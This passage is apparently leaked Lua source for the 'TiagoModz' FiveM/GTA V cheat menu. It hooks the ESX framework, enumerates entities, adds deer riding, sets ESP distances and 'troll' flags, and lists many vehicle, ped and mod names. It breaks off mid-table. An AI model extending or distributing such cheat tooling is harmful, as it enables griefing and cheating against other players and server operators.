
TiagoModz Menu Leak

Dec 22nd, 2019
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  1. print 'by TiagoModz'
  2. local Follow = false
  4. ESX = nil
  6. local untested = {
  7. state = false
  8. }
  9. local logged = true
  11. local run = {
  12. runstate = false ,
  13. scriptcheck = true ,
  14. troll = true
  15. }
  17. Citizen.CreateThread(
  18. function()
  19. while ESX == nil do
  20. TriggerEvent(
  21. 'esx:getSharedObject',
  22. function(c)
  23. ESX = c
  24. end
  25. )
  26. Citizen.Wait(1000)
  27. DisplayRadar(true)
  28. end
  29. end
  30. )
  32. local ffs = true
  34. local asstarget = nil
  36. local asshat = false
  38. local PedGuardPlayer = false
  40. local pedlist = {}
  42. local speedmit = false
  44. local aispeed = '50.0'
  46. local appid = '639257980126232637'
  48. local asset = 'rertegdf'
  50. local PlaceSelf = true
  51. local ESPDistanceOps = {50.0, 100.0, 500.0, 1000.0, 2000.0, 5000.0, 10000.0}
  52. local EspDistance = 500.0
  54. local SelectedPlayer
  56. local peds = { "a_c_boar", "a_c_killerwhale", "a_c_sharktiger", "csb_stripper_01" }
  57. local peds2 = { "s_m_y_baywatch_01", "a_m_m_acult_01", "ig_barry", "g_m_y_ballaeast_01", "u_m_y_babyd", "a_m_y_acult_01", "a_m_m_afriamer_01", "u_m_y_corpse_01", "s_m_m_armoured_02", "g_m_m_armboss_01", "g_m_y_armgoon_02", "s_m_y_blackops_03", "s_m_y_blackops_01", "s_m_y_prismuscl_01", "g_m_m_chemwork_01", "a_m_y_musclbeac_01", "csb_cop", "s_m_y_clown_01", "s_m_y_cop_01", "u_m_y_zombie_01" }
  58. local peds3 = { "cs_debra", "a_f_m_beach_01", "a_f_m_bodybuild_01", "a_f_m_business_02", "a_f_y_business_04", "mp_f_cocaine_01", "u_f_y_corpse_01", "mp_f_meth_01", "g_f_importexport_01", "a_f_y_vinewood_04", "a_m_m_tranvest_01", "a_m_m_tranvest_02", "ig_tracydisanto", "csb_stripper_02", "s_f_y_stripper_01", "a_f_m_soucentmc_01", "a_f_m_soucent_02", "u_f_y_poppymich", "ig_patricia", "s_f_y_cop_01" }
  59. local peds4 = { "a_c_husky", "a_c_cat_01", "a_c_boar", "a_c_sharkhammer", "a_c_coyote", "a_c_chimp", "a_c_chop", "a_c_cow", "a_c_deer", "a_c_dolphin", "a_c_fish", "a_c_hen", "a_c_humpback", "a_c_killerwhale", "a_c_mtlion", "a_c_pig", "a_c_pug", "a_c_rabbit_01", "a_c_retriever", "a_c_rhesus", "a_c_rottweiler", "a_c_sharktiger", "a_c_shepherd", "a_c_westy" }
  60. local vehicles = { "Freight", "Rhino", "Futo", "Vigilante", "Monster", "Panto", "Bus", "Dump", "CargoPlane" }
  61. local vehicleSpeed = { 1.0, 10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0 }
  63. local currentVehicle = 1
  64. local selectedVehicle = 1
  66. local currentVehicleSpeed = 16
  67. local selectedVehicleSpeed = 16
  69. local currentBone = 1
  70. local selectedBone = 1
  72. local currentDamage = 1
  73. local selectedDamage = 1
  75. local currentPed = 1
  76. local selectedPed = 1
  77. local selectedPedd = 1
  78. local currentPedd = 1
  79. local selectedPeddd = 1
  80. local currentPeddd = 1
  81. local selectedPedddd = 1
  82. local currentPedddd = 1
  84. local currentBullet = 1
  85. local selectedBullet = 1
  87. function EnumerateEntities(initFunc, moveFunc, disposeFunc)
  88. return coroutine.wrap(function()
  89. local iter, id = initFunc()
  90. if not id or id == 0 then
  91. disposeFunc(iter)
  92. return
  93. end
  95. local enum = {handle = iter, destructor = disposeFunc}
  96. setmetatable(enum, entityEnumerator)
  98. local next = true
  99. repeat
  100. coroutine.yield(id)
  101. next, id = moveFunc(iter)
  102. until not next
  104. enum.destructor, enum.handle = nil, nil
  105. disposeFunc(iter)
  106. end)
  107. end
  108. function EnumerateObjects()
  109. return EnumerateEntities(FindFirstObject, FindNextObject, EndFindObject)
  110. end
  112. function EnumeratePeds()
  113. return EnumerateEntities(FindFirstPed, FindNextPed, EndFindPed)
  114. end
  116. function EnumerateVehicles()
  117. return EnumerateEntities(FindFirstVehicle, FindNextVehicle, EndFindVehicle)
  118. end
  120. function EnumeratePickups()
  121. return EnumerateEntities(FindFirstPickup, FindNextPickup, EndFindPickup)
  122. end
  125. function GetAllPeds()
  126. local peds123 = {}
  127. for ped in EnumeratePeds() do
  128. if DoesEntityExist(ped) then
  129. table.insert(peds123, ped)
  130. end
  131. end
  132. return peds123
  133. end
  138. local Deer = {
  139. Handle = nil,
  140. Invincible = false,
  141. Ragdoll = false,
  142. Marker = false,
  143. Speed = {
  144. Walk = 3.0,
  145. Run = 9.0,
  146. },
  147. }
  149. function GetNearbyPeds(X, Y, Z, Radius)
  150. local NearbyPeds = {}
  151. for Ped in EnumeratePeds() do
  152. if DoesEntityExist(Ped) then
  153. local PedPosition = GetEntityCoords(Ped, false)
  154. if Vdist(X, Y, Z, PedPosition.x, PedPosition.y, PedPosition.z) <= Radius then
  155. table.insert(NearbyPeds, Ped)
  156. end
  157. end
  158. end
  159. return NearbyPeds
  160. end
  162. function GetCoordsInfrontOfEntityWithDistance(Entity, Distance, Heading)
  163. local Coordinates = GetEntityCoords(Entity, false)
  164. local Head = (GetEntityHeading(Entity) + (Heading or 0.0)) * math.pi / 180.0
  165. return {x = Coordinates.x + Distance * math.sin(-1.0 * Head), y = Coordinates.y + Distance * math.cos(-1.0 * Head), z = Coordinates.z}
  166. end
  168. function GetGroundZ(X, Y, Z)
  169. if tonumber(X) and tonumber(Y) and tonumber(Z) then
  170. local _, GroundZ = GetGroundZFor_3dCoord(X + 0.0, Y + 0.0, Z + 0.0, Citizen.ReturnResultAnyway())
  171. return GroundZ
  172. else
  173. return 0.0
  174. end
  175. end
  177. function Deer.Destroy()
  178. local Ped = PlayerPedId()
  180. DetachEntity(Ped, true, false)
  181. ClearPedTasksImmediately(Ped)
  183. SetEntityAsNoLongerNeeded(Deer.Handle)
  184. DeletePed(Deer.Handle)
  186. if DoesEntityExist(Deer.Handle) then
  187. SetEntityCoords(Deer.Handle, 601.28948974609, -4396.9853515625, 384.98565673828)
  188. end
  190. Deer.Handle = nil
  191. end
  193. function Deer.Create()
  194. local Model = GetHashKey("a_c_deer")
  195. RequestModel(Model)
  196. while not HasModelLoaded(Model) do
  197. Citizen.Wait(50)
  198. end
  200. local Ped = PlayerPedId()
  201. local PedPosition = GetEntityCoords(Ped, false)
  203. Deer.Handle = CreatePed(28, Model, PedPosition.x+1, PedPosition.y, PedPosition.z, GetEntityHeading(Ped), true, false)
  205. SetPedCanRagdoll(Deer.Handle, Deer.Ragdoll)
  206. SetEntityInvincible(Deer.Handle, Deer.Invincible)
  208. SetModelAsNoLongerNeeded(Model)
  209. end
  211. function Deer.Attach()
  212. local Ped = PlayerPedId()
  214. FreezeEntityPosition(Deer.Handle, true)
  215. FreezeEntityPosition(Ped, true)
  217. local DeerPosition = GetEntityCoords(Deer.Handle, false)
  218. SetEntityCoords(Ped, DeerPosition.x, DeerPosition.y, DeerPosition.z)
  220. AttachEntityToEntity(Ped, Deer.Handle, GetPedBoneIndex(Deer.Handle, 24816), -0.3, 0.0, 0.3, 0.0, 0.0, 90.0, false, false, false, true, 2, true)
  222. TaskPlayAnim(Ped, "rcmjosh2", "josh_sitting_loop", 8.0, 1, -1, 2, 1.0, 0, 0, 0)
  224. FreezeEntityPosition(Deer.Handle, false)
  225. FreezeEntityPosition(Ped, false)
  226. end
  228. function Deer.Ride()
  229. local Ped = PlayerPedId()
  230. local PedPosition = GetEntityCoords(Ped, false)
  231. if IsPedSittingInAnyVehicle(Ped) or IsPedGettingIntoAVehicle(Ped) then
  232. return
  233. end
  235. local AttachedEntity = GetEntityAttachedTo(Ped)
  237. if IsEntityAttached(Ped) and GetEntityModel(AttachedEntity) == GetHashKey("a_c_deer") then
  238. local SideCoordinates = GetCoordsInfrontOfEntityWithDistance(AttachedEntity, 1.0, 90.0)
  239. local SideHeading = GetEntityHeading(AttachedEntity)
  241. SideCoordinates.z = GetGroundZ(SideCoordinates.x, SideCoordinates.y, SideCoordinates.z)
  243. Deer.Handle = nil
  244. DetachEntity(Ped, true, false)
  245. ClearPedTasksImmediately(Ped)
  247. SetEntityCoords(Ped, SideCoordinates.x, SideCoordinates.y, SideCoordinates.z)
  248. SetEntityHeading(Ped, SideHeading)
  249. else
  250. for _, Ped in pairs(GetNearbyPeds(PedPosition.x, PedPosition.y, PedPosition.z, 2.0)) do
  251. if GetEntityModel(Ped) == GetHashKey("a_c_deer") then
  252. Deer.Handle = Ped
  253. Deer.Attach()
  254. break
  255. end
  256. end
  257. end
  258. end
  260. Citizen.CreateThread(function()
  261. RequestAnimDict("rcmjosh2")
  262. while not HasAnimDictLoaded("rcmjosh2") do
  263. Citizen.Wait(250)
  264. end
  265. while true do
  266. Citizen.Wait(0)
  270. local Ped = PlayerPedId()
  271. local AttachedEntity = GetEntityAttachedTo(Ped)
  273. if (not IsPedSittingInAnyVehicle(Ped) or not IsPedGettingIntoAVehicle(Ped)) and IsEntityAttached(Ped) and AttachedEntity == Deer.Handle then
  274. if DoesEntityExist(Deer.Handle) then
  275. local LeftAxisXNormal, LeftAxisYNormal = GetControlNormal(2, 218), GetControlNormal(2, 219)
  276. local Speed, Range = Deer.Speed.Walk, 4000.0
  279. local GoToOffset = GetOffsetFromEntityInWorldCoords(Deer.Handle, LeftAxisXNormal * Range, LeftAxisYNormal * -1.0 * Range, 0.0)
  281. TaskLookAtCoord(Deer.Handle, GoToOffset.x, GoToOffset.y, GoToOffset.z, 0, 0, 2)
  282. TaskGoStraightToCoord(Deer.Handle, GoToOffset.x, GoToOffset.y, GoToOffset.z, Speed, 20000, 40000.0, 0.5)
  284. if Deer.Marker then
  285. DrawMarker(6, GoToOffset.x, GoToOffset.y, GoToOffset.z, 0, 0, 0, 0, 0, 0, 1.0, 1.0, 1.0, 255, 255, 255, 255, 0, 0, 2, 0, 0, 0, 0)
  286. end
  287. end
  288. end
  289. end
  290. end)
  294. function checkValidVehicleExtras()
  295. local ar = PlayerPedId()
  296. local as = GetVehiclePedIsIn(ar, false)
  297. local at = {}
  298. for i = 0, 50, 1 do
  299. if DoesExtraExist(as, i) then
  300. local au = '~h~Extra #' .. tostring(i)
  301. local E = 'OFF'
  302. if IsVehicleExtraTurnedOn(as, i) then
  303. E = 'ON'
  304. end
  305. local av = '~h~extra ' .. tostring(i)
  306. table.insert(
  307. at,
  308. {
  309. menuName = realModName,
  310. data = {['action'] = realSpawnName, ['state'] = E}
  311. }
  312. )
  313. end
  314. end
  315. return at
  316. end
  318. function DoesVehicleHaveExtras(veh)
  319. for i = 1, 30 do
  320. if DoesExtraExist(veh, i) then
  321. return true
  322. end
  323. end
  324. return false
  325. end
  329. function checkValidVehicleMods(aw)
  330. local ar = PlayerPedId()
  331. local as = GetVehiclePedIsIn(ar, false)
  332. local at = {}
  333. local ax = GetNumVehicleMods(as, aw)
  334. if aw == 48 and ax == 0 then
  335. local ax = GetVehicleLiveryCount(as)
  336. for i = 1, ax, 1 do
  337. local ay = i - 1
  338. local az = GetLiveryName(as, ay)
  339. local realModName = GetLabelText(az)
  340. local aA, realSpawnName = aw, ay
  341. at[i] = {
  342. menuName = realModName,
  343. data = {['modid'] = aA, ['realIndex'] = realSpawnName}
  344. }
  345. end
  346. end
  347. for i = 1, ax, 1 do
  348. local ay = i - 1
  349. local az = GetModTextLabel(as, aw, ay)
  350. local realModName = GetLabelText(az)
  351. local aA, realSpawnName = ax, ay
  352. at[i] = {
  353. menuName = realModName,
  354. data = {['modid'] = aA, ['realIndex'] = realSpawnName}
  355. }
  356. end
  357. if ax > 0 then
  358. local ay = -1
  359. local aA, realSpawnName = aw, ay
  360. table.insert(
  361. at,
  362. 1,
  363. {
  364. menuName = 'Stock',
  365. data = {['modid'] = aA, ['realIndex'] = realSpawnName}
  366. }
  367. )
  368. end
  369. return at
  370. end
  372. local aB = {
  373. 'Dinghy',
  374. 'Dinghy2',
  375. 'Dinghy3',
  376. 'Dingh4',
  377. 'Jetmax',
  378. 'Marquis',
  379. 'Seashark',
  380. 'Seashark2',
  381. 'Seashark3',
  382. 'Speeder',
  383. 'Speeder2',
  384. 'Squalo',
  385. 'Submersible',
  386. 'Submersible2',
  387. 'Suntrap',
  388. 'Toro',
  389. 'Toro2',
  390. 'Tropic',
  391. 'Tropic2',
  392. 'Tug'
  393. }
  394. local aC = {
  395. 'Benson',
  396. 'Biff',
  397. 'Cerberus',
  398. 'Cerberus2',
  399. 'Cerberus3',
  400. 'Hauler',
  401. 'Hauler2',
  402. 'Mule',
  403. 'Mule2',
  404. 'Mule3',
  405. 'Mule4',
  406. 'Packer',
  407. 'Phantom',
  408. 'Phantom2',
  409. 'Phantom3',
  410. 'Pounder',
  411. 'Pounder2',
  412. 'Stockade',
  413. 'Stockade3',
  414. 'Terbyte'
  415. }
  416. local aD = {
  417. 'Blista',
  418. 'Blista2',
  419. 'Blista3',
  420. 'Brioso',
  421. 'Dilettante',
  422. 'Dilettante2',
  423. 'Issi2',
  424. 'Issi3',
  425. 'issi4',
  426. 'Iss5',
  427. 'issi6',
  428. 'Panto',
  429. 'Prarire',
  430. 'Rhapsody'
  431. }
  432. local aE = {
  433. 'CogCabrio',
  434. 'Exemplar',
  435. 'F620',
  436. 'Felon',
  437. 'Felon2',
  438. 'Jackal',
  439. 'Oracle',
  440. 'Oracle2',
  441. 'Sentinel',
  442. 'Sentinel2',
  443. 'Windsor',
  444. 'Windsor2',
  445. 'Zion',
  446. 'Zion2'
  447. }
  448. local aF = {
  449. 'Bmx',
  450. 'Cruiser',
  451. 'Fixter',
  452. 'Scorcher',
  453. 'Tribike',
  454. 'Tribike2',
  455. 'tribike3'
  456. }
  457. local aG = {
  458. 'ambulance',
  459. 'FBI',
  460. 'FBI2',
  461. 'FireTruk',
  462. 'PBus',
  463. 'police',
  464. 'Police2',
  465. 'Police3',
  466. 'Police4',
  467. 'PoliceOld1',
  468. 'PoliceOld2',
  469. 'PoliceT',
  470. 'Policeb',
  471. 'Polmav',
  472. 'Pranger',
  473. 'Predator',
  474. 'Riot',
  475. 'Riot2',
  476. 'Sheriff',
  477. 'Sheriff2'
  478. }
  479. local aH = {
  480. 'Akula',
  481. 'Annihilator',
  482. 'Buzzard',
  483. 'Buzzard2',
  484. 'Cargobob',
  485. 'Cargobob2',
  486. 'Cargobob3',
  487. 'Cargobob4',
  488. 'Frogger',
  489. 'Frogger2',
  490. 'Havok',
  491. 'Hunter',
  492. 'Maverick',
  493. 'Savage',
  494. 'Seasparrow',
  495. 'Skylift',
  496. 'Supervolito',
  497. 'Supervolito2',
  498. 'Swift',
  499. 'Swift2',
  500. 'Valkyrie',
  501. 'Valkyrie2',
  502. 'Volatus'
  503. }
  504. local aI = {
  505. 'Bulldozer',
  506. 'Cutter',
  507. 'Dump',
  508. 'Flatbed',
  509. 'Guardian',
  510. 'Handler',
  511. 'Mixer',
  512. 'Mixer2',
  513. 'Rubble',
  514. 'Tiptruck',
  515. 'Tiptruck2'
  516. }
  517. local aJ = {
  518. 'APC',
  519. 'Barracks',
  520. 'Barracks2',
  521. 'Barracks3',
  522. 'Barrage',
  523. 'Chernobog',
  524. 'Crusader',
  525. 'Halftrack',
  526. 'Khanjali',
  527. 'Rhino',
  528. 'Scarab',
  529. 'Scarab2',
  530. 'Scarab3',
  531. 'Thruster',
  532. 'Trailersmall2'
  533. }
  534. local aK = {
  535. 'Akuma',
  536. 'Avarus',
  537. 'Bagger',
  538. 'Bati2',
  539. 'Bati',
  540. 'BF400',
  541. 'Blazer4',
  542. 'CarbonRS',
  543. 'Chimera',
  544. 'Cliffhanger',
  545. 'Daemon',
  546. 'Daemon2',
  547. 'Defiler',
  548. 'Deathbike',
  549. 'Deathbike2',
  550. 'Deathbike3',
  551. 'Diablous',
  552. 'Diablous2',
  553. 'Double',
  554. 'Enduro',
  555. 'esskey',
  556. 'Faggio2',
  557. 'Faggio3',
  558. 'Faggio',
  559. 'Fcr2',
  560. 'fcr',
  561. 'gargoyle',
  562. 'hakuchou2',
  563. 'hakuchou',
  564. 'hexer',
  565. 'innovation',
  566. 'Lectro',
  567. 'Manchez',
  568. 'Nemesis',
  569. 'Nightblade',
  570. 'Oppressor',
  571. 'Oppressor2',
  572. 'PCJ',
  573. 'Ratbike',
  574. 'Ruffian',
  575. 'Sanchez2',
  576. 'Sanchez',
  577. 'Sanctus',
  578. 'Shotaro',
  579. 'Sovereign',
  580. 'Thrust',
  581. 'Vader',
  582. 'Vindicator',
  583. 'Vortex',
  584. 'Wolfsbane',
  585. 'zombiea',
  586. 'zombieb'
  587. }
  588. local aL = {
  589. 'Blade',
  590. 'Buccaneer',
  591. 'Buccaneer2',
  592. 'Chino',
  593. 'Chino2',
  594. 'clique',
  595. 'Deviant',
  596. 'Dominator',
  597. 'Dominator2',
  598. 'Dominator3',
  599. 'Dominator4',
  600. 'Dominator5',
  601. 'Dominator6',
  602. 'Dukes',
  603. 'Dukes2',
  604. 'Ellie',
  605. 'Faction',
  606. 'faction2',
  607. 'faction3',
  608. 'Gauntlet',
  609. 'Gauntlet2',
  610. 'Hermes',
  611. 'Hotknife',
  612. 'Hustler',
  613. 'Impaler',
  614. 'Impaler2',
  615. 'Impaler3',
  616. 'Impaler4',
  617. 'Imperator',
  618. 'Imperator2',
  619. 'Imperator3',
  620. 'Lurcher',
  621. 'Moonbeam',
  622. 'Moonbeam2',
  623. 'Nightshade',
  624. 'Phoenix',
  625. 'Picador',
  626. 'RatLoader',
  627. 'RatLoader2',
  628. 'Ruiner',
  629. 'Ruiner2',
  630. 'Ruiner3',
  631. 'SabreGT',
  632. 'SabreGT2',
  633. 'Sadler2',
  634. 'Slamvan',
  635. 'Slamvan2',
  636. 'Slamvan3',
  637. 'Slamvan4',
  638. 'Slamvan5',
  639. 'Slamvan6',
  640. 'Stalion',
  641. 'Stalion2',
  642. 'Tampa',
  643. 'Tampa3',
  644. 'Tulip',
  645. 'Vamos,',
  646. 'Vigero',
  647. 'Virgo',
  648. 'Virgo2',
  649. 'Virgo3',
  650. 'Voodoo',
  651. 'Voodoo2',
  652. 'Yosemite'
  653. }
  654. local aM = {
  655. 'BFinjection',
  656. 'Bifta',
  657. 'Blazer',
  658. 'Blazer2',
  659. 'Blazer3',
  660. 'Blazer5',
  661. 'Bohdi',
  662. 'Brawler',
  663. 'Bruiser',
  664. 'Bruiser2',
  665. 'Bruiser3',
  666. 'Caracara',
  667. 'DLoader',
  668. 'Dune',
  669. 'Dune2',
  670. 'Dune3',
  671. 'Dune4',
  672. 'Dune5',
  673. 'Insurgent',
  674. 'Insurgent2',
  675. 'Insurgent3',
  676. 'Kalahari',
  677. 'Kamacho',
  678. 'LGuard',
  679. 'Marshall',
  680. 'Mesa',
  681. 'Mesa2',
  682. 'Mesa3',
  683. 'Monster',
  684. 'Monster4',
  685. 'Monster5',
  686. 'Nightshark',
  687. 'RancherXL',
  688. 'RancherXL2',
  689. 'Rebel',
  690. 'Rebel2',
  691. 'RCBandito',
  692. 'Riata',
  693. 'Sandking',
  694. 'Sandking2',
  695. 'Technical',
  696. 'Technical2',
  697. 'Technical3',
  698. 'TrophyTruck',
  699. 'TrophyTruck2',
  700. 'Freecrawler',
  701. 'Menacer'
  702. }
  703. local aN = {
  704. 'AlphaZ1',
  705. 'Avenger',
  706. 'Avenger2',
  707. 'Besra',
  708. 'Blimp',
  709. 'blimp2',
  710. 'Blimp3',
  711. 'Bombushka',
  712. 'Cargoplane',
  713. 'Cuban800',
  714. 'Dodo',
  715. 'Duster',
  716. 'Howard',
  717. 'Hydra',
  718. 'Jet',
  719. 'Lazer',
  720. 'Luxor',
  721. 'Luxor2',
  722. 'Mammatus',
  723. 'Microlight',
  724. 'Miljet',
  725. 'Mogul',
  726. 'Molotok',
  727. 'Nimbus',
  728. 'Nokota',
  729. 'Pyro',
  730. 'Rogue',
  731. 'Seabreeze',
  732. 'Shamal',
  733. 'Starling',
  734. 'Stunt',
  735. 'Titan',
  736. 'Tula',
  737. 'Velum',
  738. 'Velum2',
  739. 'Vestra',
  740. 'Volatol',
  741. 'Striekforce'
  742. }
  743. local aO = {
  744. 'BJXL',
  745. 'Baller',
  746. 'Baller2',
  747. 'Baller3',
  748. 'Baller4',
  749. 'Baller5',
  750. 'Baller6',
  751. 'Cavalcade',
  752. 'Cavalcade2',
  753. 'Dubsta',
  754. 'Dubsta2',
  755. 'Dubsta3',
  756. 'FQ2',
  757. 'Granger',
  758. 'Gresley',
  759. 'Habanero',
  760. 'Huntley',
  761. 'Landstalker',
  762. 'patriot',
  763. 'Patriot2',
  764. 'Radi',
  765. 'Rocoto',
  766. 'Seminole',
  767. 'Serrano',
  768. 'Toros',
  769. 'XLS',
  770. 'XLS2'
  771. }
  772. local aP = {
  773. 'Asea',
  774. 'Asea2',
  775. 'Asterope',
  776. 'Cog55',
  777. 'Cogg552',
  778. 'Cognoscenti',
  779. 'Cognoscenti2',
  780. 'emperor',
  781. 'emperor2',
  782. 'emperor3',
  783. 'Fugitive',
  784. 'Glendale',
  785. 'ingot',
  786. 'intruder',
  787. 'limo2',
  788. 'premier',
  789. 'primo',
  790. 'primo2',
  791. 'regina',
  792. 'romero',
  793. 'stafford',
  794. 'Stanier',
  795. 'stratum',
  796. 'stretch',
  797. 'surge',
  798. 'tailgater',
  799. 'warrener',
  800. 'Washington'
  801. }
  802. local aQ = {
  803. 'Airbus',
  804. 'Brickade',
  805. 'Bus',
  806. 'Coach',
  807. 'Rallytruck',
  808. 'Rentalbus',
  809. 'taxi',
  810. 'Tourbus',
  811. 'Trash',
  812. 'Trash2',
  813. 'WastIndr',
  814. 'PBus2'
  815. }
  816. local aR = {
  817. 'Alpha',
  818. 'Banshee',
  819. 'Banshee2',
  820. 'BestiaGTS',
  821. 'Buffalo',
  822. 'Buffalo2',
  823. 'Buffalo3',
  824. 'Carbonizzare',
  825. 'Comet2',
  826. 'Comet3',
  827. 'Comet4',
  828. 'Comet5',
  829. 'Coquette',
  830. 'Deveste',
  831. 'Elegy',
  832. 'Elegy2',
  833. 'Feltzer2',
  834. 'Feltzer3',
  835. 'FlashGT',
  836. 'Furoregt',
  837. 'Fusilade',
  838. 'Futo',
  839. 'GB200',
  840. 'Hotring',
  841. 'Infernus2',
  842. 'Italigto',
  843. 'Jester',
  844. 'Jester2',
  845. 'Khamelion',
  846. 'Kurama',
  847. 'Kurama2',
  848. 'TiagoMenu',
  849. 'MAssacro',
  850. 'MAssacro2',
  851. 'neon',
  852. 'Ninef',
  853. 'ninfe2',
  854. 'omnis',
  855. 'Pariah',
  856. 'Penumbra',
  857. 'Raiden',
  858. 'RapidGT',
  859. 'RapidGT2',
  860. 'Raptor',
  861. 'Revolter',
  862. 'Ruston',
  863. 'Schafter2',
  864. 'Schafter3',
  865. 'Schafter4',
  866. 'Schafter5',
  867. 'Schafter6',
  868. 'Schlagen',
  869. 'Schwarzer',
  870. 'Sentinel3',
  871. 'Seven70',
  872. 'Specter',
  873. 'Specter2',
  874. 'Streiter',
  875. 'Sultan',
  876. 'Surano',
  877. 'Tampa2',
  878. 'Tropos',
  879. 'Verlierer2',
  880. 'ZR380',
  881. 'ZR3802',
  882. 'ZR3803'
  883. }
  884. local aS = {
  885. 'Ardent',
  886. 'BType',
  887. 'BType2',
  888. 'BType3',
  889. 'Casco',
  890. 'Cheetah2',
  891. 'Cheburek',
  892. 'Coquette2',
  893. 'Coquette3',
  894. 'Deluxo',
  895. 'Fagaloa',
  896. 'Gt500',
  897. 'JB700',
  898. 'JEster3',
  899. 'MAmba',
  900. 'Manana',
  901. 'Michelli',
  902. 'Monroe',
  903. 'Peyote',
  904. 'Pigalle',
  905. 'RapidGT3',
  906. 'Retinue',
  907. 'Savastra',
  908. 'Stinger',
  909. 'Stingergt',
  910. 'Stromberg',
  911. 'Swinger',
  912. 'Torero',
  913. 'Tornado',
  914. 'Tornado2',
  915. 'Tornado3',
  916. 'Tornado4',
  917. 'Tornado5',
  918. 'Tornado6',
  919. 'Viseris',
  920. 'Z190',
  921. 'ZType'
  922. }
  923. local aT = {
  924. 'Adder',
  925. 'Autarch',
  926. 'Bullet',
  927. 'Cheetah',
  928. 'Cyclone',
  929. 'EntityXF',
  930. 'Entity2',
  931. 'FMJ',
  932. 'GP1',
  933. 'Infernus',
  934. 'LE7B',
  935. 'Nero',
  936. 'Nero2',
  937. 'Osiris',
  938. 'Penetrator',
  939. 'PFister811',
  940. 'Prototipo',
  941. 'Reaper',
  942. 'SC1',
  943. 'Scramjet',
  944. 'Sheava',
  945. 'SultanRS',
  946. 'Superd',
  947. 'T20',
  948. 'Taipan',
  949. 'Tempesta',
  950. 'Tezeract',
  951. 'Turismo2',
  952. 'Turismor',
  953. 'Tyrant',
  954. 'Tyrus',
  955. 'Vacca',
  956. 'Vagner',
  957. 'Vigilante',
  958. 'Visione',
  959. 'Voltic',
  960. 'Voltic2',
  961. 'Zentorno',
  962. 'Italigtb',
  963. 'Italigtb2',
  964. 'XA21'
  965. }
  966. local aU = {
  967. 'ArmyTanker',
  968. 'ArmyTrailer',
  969. 'ArmyTrailer2',
  970. 'BaleTrailer',
  971. 'BoatTrailer',
  972. 'CableCar',
  973. 'DockTrailer',
  974. 'Graintrailer',
  975. 'Proptrailer',
  976. 'Raketailer',
  977. 'TR2',
  978. 'TR3',
  979. 'TR4',
  980. 'TRFlat',
  981. 'TVTrailer',
  982. 'Tanker',
  983. 'Tanker2',
  984. 'Trailerlogs',
  985. 'Trailersmall',
  986. 'Trailers',
  987. 'Trailers2',
  988. 'Trailers3'
  989. }
  990. local aV = {
  991. 'Freight',
  992. 'Freightcar',
  993. 'Freightcont1',
  994. 'Freightcont2',
  995. 'Freightgrain',
  996. 'Freighttrailer',
  997. 'TankerCar'
  998. }
  999. local aW = {
  1000. 'Airtug',
  1001. 'Caddy',
  1002. 'Caddy2',
  1003. 'Caddy3',
  1004. 'Docktug',
  1005. 'Forklift',
  1006. 'Mower',
  1007. 'Ripley',
  1008. 'Sadler',
  1009. 'Scrap',
  1010. 'TowTruck',
  1011. 'Towtruck2',
  1012. 'Tractor',
  1013. 'Tractor2',
  1014. 'Tractor3',
  1015. 'TrailerLArge2',
  1016. 'Utilitruck',
  1017. 'Utilitruck3',
  1018. 'Utilitruck2'
  1019. }
  1020. local aX = {
  1021. 'Bison',
  1022. 'Bison2',
  1023. 'Bison3',
  1024. 'BobcatXL',
  1025. 'Boxville',
  1026. 'Boxville2',
  1027. 'Boxville3',
  1028. 'Boxville4',
  1029. 'Boxville5',
  1030. 'Burrito',
  1031. 'Burrito2',
  1032. 'Burrito3',
  1033. 'Burrito4',
  1034. 'Burrito5',
  1035. 'Camper',
  1036. 'GBurrito',
  1037. 'GBurrito2',
  1038. 'Journey',
  1039. 'Minivan',
  1040. 'Minivan2',
  1041. 'Paradise',
  1042. 'pony',
  1043. 'Pony2',
  1044. 'Rumpo',
  1045. 'Rumpo2',
  1046. 'Rumpo3',
  1047. 'Speedo',
  1048. 'Speedo2',
  1049. 'Speedo4',
  1050. 'Surfer',
  1051. 'Surfer2',
  1052. 'Taco',
  1053. 'Youga',
  1054. 'youga2'
  1055. }
  1056. local aY = {
  1057. 'Boats',
  1058. 'Commercial',
  1059. 'Compacts',
  1060. 'Coupes',
  1061. 'Cycles',
  1062. 'Emergency',
  1063. 'Helictopers',
  1064. 'Industrial',
  1065. 'Military',
  1066. 'Motorcycles',
  1067. 'Muscle',
  1068. 'Off-Road',
  1069. 'Planes',
  1070. 'SUVs',
  1071. 'Sedans',
  1072. 'Service',
  1073. 'Sports',
  1074. 'Sports Classic',
  1075. 'Super',
  1076. 'Trailer',
  1077. 'Trains',
  1078. 'Utility',
  1079. 'Vans'
  1080. }
  1081. local aZ = {
  1082. aB,
  1083. aC,
  1084. aD,
  1085. aE,
  1086. aF,
  1087. aG,
  1088. aH,
  1089. aI,
  1090. aJ,
  1091. aK,
  1092. aL,
  1093. aM,
  1094. aN,
  1095. aO,
  1096. aP,
  1097. aQ,
  1098. aR,
  1099. aS,
  1100. aT,
  1101. aU,
  1102. aV,
  1103. aW,
  1104. aX
  1105. }
  1107. local b1 = false
  1108. local b2 = false
  1109. local b3 = false
  1110. local b4 = false
  1111. local b5 = nil
  1112. local b6 = {}
  1113. local b7 = {}
  1114. local b8 = nil
  1115. local b9 = false
  1116. local ba = -1
  1117. local bb = -1
  1118. local bc = -1
  1119. local bd = false
  1120. local be = {
  1121. {name = '~h~Spoilers', id = 0},
  1122. {name = '~h~Front Bumper', id = 1},
  1123. {name = '~h~Rear Bumper', id = 2},
  1124. {name = '~h~Side Skirt', id = 3},
  1125. {name = '~h~Exhaust', id = 4},
  1126. {name = '~h~Frame', id = 5},
  1127. {name = '~h~Grille', id = 6},
  1128. {name = '~h~Hood', id = 7},
  1129. {name = '~h~Fender', id = 8},
  1130. {name = '~h~Right Fender', id = 9},
  1131. {name = '~h~Roof', id = 10},
  1132. {name = '~h~Vanity Plates', id = 25},
  1133. {name = '~h~Trim', id = 27},
  1134. {name = '~h~Ornaments', id = 28},
  1135. {name = '~h~Dashboard', id = 29},
  1136. {name = '~h~Dial', id = 30},
  1137. {name = '~h~Door Speaker', id = 31},
  1138. {name = '~h~Seats', id = 32},
  1139. {name = '~h~Steering Wheel', id = 33},
  1140. {name = '~h~Shifter Leavers', id = 34},
  1141. {name = '~h~Plaques', id = 35},
  1142. {name = '~h~Speakers', id = 36},
  1143. {name = '~h~Trunk', id = 37},
  1144. {name = '~h~Hydraulics', id = 38},
  1145. {name = '~h~Engine Block', id = 39},
  1146. {name = '~h~Air Filter', id = 40},
  1147. {name = '~h~Struts', id = 41},
